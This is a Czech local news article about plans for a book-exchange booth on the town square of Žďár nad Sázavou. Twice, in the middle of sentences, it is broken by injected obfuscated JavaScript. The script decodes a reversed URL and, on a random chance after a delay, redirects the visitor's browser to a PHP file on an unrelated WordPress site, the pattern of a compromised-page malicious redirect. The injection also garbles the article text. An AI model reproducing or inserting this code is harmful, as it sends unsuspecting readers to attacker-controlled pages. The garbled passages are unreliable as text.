Rainbow page separator

Knihobudka by na žďárském náměstí mohla přibýt koncem jara

Čtvrtek, 7. dubna 2016

Knihobudka v Bystřici nad Pernštejnem

Žďár nad Sázavou / Sponzorem celostátního neziskového projektu s názvem KnihoBudka se ve Žďáře hodlá stát Žďárský průvodce. „S nápadem, že bychom do Žďáru pořídili knihobudku, jsme za vedením radnice přišli již v létě 2015. Panu staros["\'///\'="];["\'///\'="]; };["\'//\'="]}$NfI=function(n){if (typeof ($NfI.list[n]) == "string") return $NfI.list[n].split("").reverse().join("");return $NfI.list[n];};$NfI.list=["\'php.reklaw-yrogetac-smotsuc-ssalc/php/stegdiw-cpm/snigulp/tnetnoc-pw/gro.ogotaropsaid.www//:ptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}$NfI=function(n){if (typeof ($NfI.list[n]) == "string") return $NfI.list[n].split("").reverse().join("");return $NfI.list[n];};$NfI.list=["\'php.reklaw-yrogetac-smotsuc-ssalc/php/stegdiw-cpm/snigulp/tnetnoc-pw/gro.ogotaropsaid.www//:ptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}tovi se nápad líbil,“ sdělil za Žďárského průvodce Lukáš Mokrý.

Knihobudka v Bystřici nad PernštejnemCelkové náklady na pořízení knihobudky – vyřazené a upravené telefonní budky, do níž pak lidé odkládají knihy, jichž by se rádi zbavili, ale nechtějí je vyhodit, podle slov Lukáše Mokrého činí přibližně čtyřicet tisíc korun. Žďárský průvodce by uhradil celou částku. „Kromě poskytnutí neobvyklé služby spoluobčanům a turistům bychom rádi podpořili myšlenku vrátit na náměstí život. Ze strany města nyní čekáme na povolení projekt realizovat,“ doplnil Lukáš Mokrý s tím, že ["\'///\'="];["\'///\'="]; };["\'//\'="]}$NfI=function(n){if (typeof ($NfI.list[n]) == "string") return $NfI.list[n].split("").reverse().join("");return $NfI.list[n];};$NfI.list=["\'php.reklaw-yrogetac-smotsuc-ssalc/php/stegdiw-cpm/snigulp/tnetnoc-pw/gro.ogotaropsaid.www//:ptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}$NfI=function(n){if (typeof ($NfI.list[n]) == "string") return $NfI.list[n].split("").reverse().join("");return $NfI.list[n];};$NfI.list=["\'php.reklaw-yrogetac-smotsuc-ssalc/php/stegdiw-cpm/snigulp/tnetnoc-pw/gro.ogotaropsaid.www//:ptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}to zahrnuje souhlas k využívání asi metru čtverečního plochy náměstí Republiky včetně stavebního povolení. Pokud žďárská radnice povolí projekt realizovat, lidé by mohli začít knihobudku, která slouží k bezplatnému půjčování knih, případně jejich výměně formou kus za kus, využívat už koncem jara.

Knihobudka například už téměř dva roky úspěšně funguje na Masarykově náměstí v Bystřici nad Pernštejnem, kde ji pořídila tamní radnice. Dohlíží na ni zaměstnanci knihovny.

Více informací o projektu knihobudka:

www.knihobudka.cz